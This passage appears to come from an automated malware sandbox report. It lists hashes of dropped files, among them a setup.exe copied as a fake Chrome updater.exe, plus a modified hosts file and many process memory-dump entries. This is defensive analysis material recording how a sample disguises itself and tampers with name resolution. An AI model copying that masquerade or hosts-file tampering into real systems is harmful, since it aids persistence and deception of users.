                                                8b9356da7d6ec043c94a6542c324ca7c9861038c2015ab051e1c3dfd25dc3a4cbd8684f396b66577c7d6ae89e09bc98df6fc82a2796f3c56658f5f321ccb3f45

                                              • C:\Windows\Temp\setup.exe
                                                Filesize

                                                7.1MB

                                                MD5

                                                e85216c5e3420493ea698778ccf16073

                                                SHA1

                                                ae034212c790f7181ea92426a5dcc08cafd0b711

                                                SHA256

                                                d007ef5a94993c5e069e8e41e324e811146d956b15db0e04916798b84a7cd28d

                                                SHA512

                                                8b9356da7d6ec043c94a6542c324ca7c9861038c2015ab051e1c3dfd25dc3a4cbd8684f396b66577c7d6ae89e09bc98df6fc82a2796f3c56658f5f321ccb3f45

                                              • C:\Windows\system32\drivers\etc\hosts
                                                Filesize

                                                1KB

                                                MD5

                                                f3f6968a4c0f457f427eb17f7cc5f68b

                                                SHA1

                                                872933578f4b7d555158189ed02015f192daa7c6

                                                SHA256

                                                774ad8ef51d495bfec8b3e3d058210d5ce715c66f76008f1e4f2b6203d33e41c

                                                SHA512

                                                5dafd8fb0cae325865c0a897e3719250903ac5da72b0fa5006ebda505ee625cd9eacf09c5043c3b3648a5677e96c87f1f2995712471cd1539cd9c73a7e3d0d49

                                              • \??\PIPE\srvsvc
                                                MD5

                                                d41d8cd98f00b204e9800998ecf8427e

                                                SHA1

                                                da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                SHA256

                                                e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                SHA512

                                                cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                              • \Program Files\Chrome\updater.exe
                                                Filesize

                                                7.1MB

                                                MD5

                                                e85216c5e3420493ea698778ccf16073

                                                SHA1

                                                ae034212c790f7181ea92426a5dcc08cafd0b711

                                                SHA256

                                                d007ef5a94993c5e069e8e41e324e811146d956b15db0e04916798b84a7cd28d

                                                SHA512

                                                8b9356da7d6ec043c94a6542c324ca7c9861038c2015ab051e1c3dfd25dc3a4cbd8684f396b66577c7d6ae89e09bc98df6fc82a2796f3c56658f5f321ccb3f45

                                              • \Windows\Temp\setup.exe
                                                Filesize

                                                7.1MB

                                                MD5

                                                e85216c5e3420493ea698778ccf16073

                                                SHA1

                                                ae034212c790f7181ea92426a5dcc08cafd0b711

                                                SHA256

                                                d007ef5a94993c5e069e8e41e324e811146d956b15db0e04916798b84a7cd28d

                                                SHA512

                                                8b9356da7d6ec043c94a6542c324ca7c9861038c2015ab051e1c3dfd25dc3a4cbd8684f396b66577c7d6ae89e09bc98df6fc82a2796f3c56658f5f321ccb3f45

                                              • memory/268-127-0x0000000000000000-mapping.dmp
                                              • memory/288-97-0x0000000000000000-mapping.dmp
                                              • memory/336-72-0x0000000000000000-mapping.dmp
                                              • memory/376-54-0x00000000764C1000-0x00000000764C3000-memory.dmp
                                                Filesize

                                                8KB

                                              • memory/576-156-0x0000000000000000-mapping.dmp
                                              • memory/576-90-0x0000000000000000-mapping.dmp
                                              • memory/608-109-0x0000000000000000-mapping.dmp
                                              • memory/608-137-0x0000000000000000-mapping.dmp
                                              • memory/696-145-0x0000000000000000-mapping.dmp
                                              • memory/696-99-0x0000000000000000-mapping.dmp
                                              • memory/900-101-0x0000000000000000-mapping.dmp
                                              • memory/900-91-0x0000000000000000-mapping.dmp
                                              • memory/912-146-0x0000000000000000-mapping.dmp
                                              • memory/912-157-0x0000000000000000-mapping.dmp
                                              • memory/928-89-0x0000000000000000-mapping.dmp
                                              • memory/932-94-0x0000000000000000-mapping.dmp
                                              • memory/960-159-0x0000000000000000-mapping.dmp
                                              • memory/1008-81-0x0000000000000000-mapping.dmp
                                              • memory/1020-111-0x0000000000000000-mapping.dmp
                                              • memory/1032-105-0x0000000000000000-mapping.dmp
                                              • memory/1048-100-0x0000000000000000-mapping.dmp
                                              • memory/1056-107-0x0000000000000000-mapping.dmp
                                              • memory/1060-106-0x0000000000000000-mapping.dmp
                                              • memory/1164-136-0x0000000000000000-mapping.dmp
                                              • memory/1168-95-0x0000000000000000-mapping.dmp
                                              • memory/1300-153-0x0000000000000000-mapping.dmp
                                              • memory/1328-166-0x0000000000400000-0x000000000040C000-memory.dmp
                                                Filesize

                                                48KB

                                              • memory/1328-162-0x0000000000400000-0x000000000040C000-memory.dmp
                                                Filesize

                                                48KB

                                              • memory/1328-161-0x0000000000400000-0x000000000040C000-memory.dmp
                                                Filesize

                                                48KB

                                              • memory/1328-154-0x0000000000000000-mapping.dmp
                                              • memory/1328-165-0x0000000000400000-0x000000000040C000-memory.dmp
                                                Filesize

                                                48KB

                                              • memory/1328-163-0x0000000000400000-0x000000000040C000-memory.dmp
                                                Filesize

                                                48KB

                                              • memory/1328-167-0x0000000000400000-0x000000000040C000-memory.dmp
                                                Filesize

                                                48KB

                                              • memory/1328-169-0x0000000000400000-0x000000000040C000-memory.dmp
                                                Filesize

                                                48KB

                                              • memory/1328-197-0x0000000000400000-0x000000000040C000-memory.dmp
                                                Filesize

                                                48KB

                                              • memory/1344-160-0x0000000001180000-0x0000000001186000-memory.dmp
                                                Filesize

                                                24KB

                                              • memory/1352-86-0x0000000000000000-mapping.dmp
                                              • memory/1384-110-0x0000000000000000-mapping.dmp
                                              • memory/1508-58-0x0000000000000000-mapping.dmp
                                              • memory/1512-75-0x000007FEED710000-0x000007FEEE133000-memory.dmp
                                                Filesize

                                                10.1MB

                                              • memory/1512-80-0x000000000251B000-0x000000000253A000-memory.dmp
                                                Filesize

                                                124KB

                                              • memory/1512-77-0x0000000002514000-0x0000000002517000-memory.dmp
                                                Filesize

                                                12KB

                                              • memory/1512-78-0x000000001B700000-0x000000001B9FF000-memory.dmp
                                                Filesize

                                                3.0MB

                                              • memory/1512-76-0x000007FEECBB0000-0x000007FEED70D000-memory.dmp
                                                Filesize

                                                11.4MB

                                              • memory/1512-79-0x0000000002514000-0x0000000002517000-memory.dmp
                                                Filesize

                                                12KB

                                              • memory/1512-73-0x0000000000000000-mapping.dmp
                                              • memory/1560-119-0x0000000000400000-0x000000000106A000-memory.dmp
                                                Filesize

                                                12.4MB

                                              • memory/1560-124-0x0000000000400000-0x000000000106A000-memory.dmp
                                                Filesize

                                                12.4MB

                                              • memory/1560-116-0x0000000000000000-mapping.dmp
                                              • memory/1560-123-0x00000000774C0000-0x0000000077669000-memory.dmp
                                                Filesize

                                                1.7MB

                                              • memory/1560-122-0x0000000000400000-0x000000000106A000-memory.dmp
                                                Filesize

                                                12.4MB

                                              • memory/1560-120-0x0000000000400000-0x000000000106A000-memory.dmp
                                                Filesize

                                                12.4MB

                                              • memory/1560-121-0x00000000774C0000-0x0000000077669000-memory.dmp
                                                Filesize

                                                1.7MB

                                              • memory/1580-113-0x0000000000000000-mapping.dmp
                                              • memory/1580-98-0x0000000000000000-mapping.dmp
                                              • memory/1608-147-0x0000000000000000-mapping.dmp
                                              • memory/1608-108-0x0000000000000000-mapping.dmp
                                              • memory/1612-144-0x0000000000000000-mapping.dmp
                                              • memory/1612-128-0x0000000000000000-mapping.dmp
                                              • memory/1612-131-0x000007FEECAD0000-0x000007FEED4F3000-memory.dmp
                                                Filesize

                                                10.1MB

                                              • memory/1612-132-0x000007FEEBF70000-0x000007FEECACD000-memory.dmp
                                                Filesize

                                                11.4MB

                                              • memory/1612-133-0x0000000001064000-0x0000000001067000-memory.dmp
                                                Filesize

                                                12KB

                                              • memory/1612-134-0x0000000001064000-0x0000000001067000-memory.dmp
                                                Filesize

                                                12KB

                                              • memory/1612-135-0x000000000106B000-0x000000000108A000-memory.dmp
                                                Filesize

                                                124KB

                                              • memory/1616-141-0x0000000000000000-mapping.dmp
                                              • memory/1692-82-0x0000000000000000-mapping.dmp
                                              • memory/1692-65-0x00000000774C0000-0x0000000077669000-memory.dmp
                                                Filesize

                                                1.7MB

                                              • memory/1692-67-0x0000000000400000-0x000000000106A000-memory.dmp
                                                Filesize

                                                12.4MB

                                              • memory/1692-64-0x0000000000400000-0x000000000106A000-memory.dmp
                                                Filesize

                                                12.4MB

                                              • memory/1692-68-0x00000000774C0000-0x0000000077669000-memory.dmp
                                                Filesize

                                                1.7MB

                                              • memory/1692-63-0x0000000000400000-0x000000000106A000-memory.dmp
                                                Filesize

                                                12.4MB

                                              • memory/1692-66-0x0000000000400000-0x000000000106A000-memory.dmp
                                                Filesize

                                                12.4MB

                                              • memory/1692-56-0x0000000000000000-mapping.dmp
                                              • memory/1708-59-0x0000000000000000-mapping.dmp
                                              • memory/1728-71-0x000007FEFBD41000-0x000007FEFBD43000-memory.dmp
                                                Filesize

                                                8KB

                                              • memory/1728-70-0x000000001B9B0000-0x000000001BDCC000-memory.dmp
                                                Filesize

                                                4.1MB

                                              • memory/1728-69-0x00000000000F0000-0x000000000050C000-memory.dmp
                                                Filesize

                                                4.1MB

                                              • memory/1740-93-0x0000000000000000-mapping.dmp
                                              • memory/1748-149-0x0000000000000000-mapping.dmp
                                              • memory/1760-158-0x0000000000000000-mapping.dmp
                                              • memory/1792-155-0x0000000000000000-mapping.dmp
                                              • memory/1804-87-0x0000000000000000-mapping.dmp
                                              • memory/1808-138-0x0000000000000000-mapping.dmp
                                              • memory/1812-148-0x0000000000000000-mapping.dmp
                                              • memory/1816-92-0x0000000000000000-mapping.dmp
                                              • memory/1816-143-0x0000000000000000-mapping.dmp
                                              • memory/1876-151-0x0000000000000000-mapping.dmp
                                              • memory/1876-102-0x0000000000000000-mapping.dmp
                                              • memory/1888-142-0x0000000000000000-mapping.dmp
                                              • memory/1888-104-0x0000000000000000-mapping.dmp
                                              • memory/1960-189-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/1960-192-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/1960-201-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/1960-85-0x0000000000000000-mapping.dmp
                                              • memory/1960-196-0x00000000000E0000-0x0000000000100000-memory.dmp
                                                Filesize

                                                128KB

                                              • memory/1960-195-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/1960-194-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/1960-184-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/1960-186-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/1960-188-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/1960-173-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/1960-174-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/1960-176-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/1960-178-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/1960-180-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/1960-182-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/1960-183-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/1960-190-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/1960-150-0x0000000000000000-mapping.dmp
                                              • memory/2016-103-0x0000000000000000-mapping.dmp
                                              • memory/2016-114-0x0000000000000000-mapping.dmp
                                              • memory/2016-152-0x0000000000000000-mapping.dmp
                                              • memory/2020-198-0x0000000000060000-0x0000000000067000-memory.dmp
                                                Filesize

                                                28KB

                                              • memory/2020-199-0x0000000000280000-0x0000000000286000-memory.dmp
                                                Filesize

                                                24KB

                                              • memory/2020-140-0x0000000000000000-mapping.dmp
                                              • memory/2024-88-0x0000000000000000-mapping.dmp
                                              • memory/2032-118-0x0000000001100000-0x0000000001D6A000-memory.dmp
                                                Filesize

                                                12.4MB

                                              • memory/2032-96-0x0000000000000000-mapping.dmp
                                              • memory/2032-125-0x0000000001100000-0x0000000001D6A000-memory.dmp
                                                Filesize

                                                12.4MB

                                              • memory/2040-84-0x0000000000000000-mapping.dmp
                                              • memory/2044-83-0x0000000000000000-mapping.dmp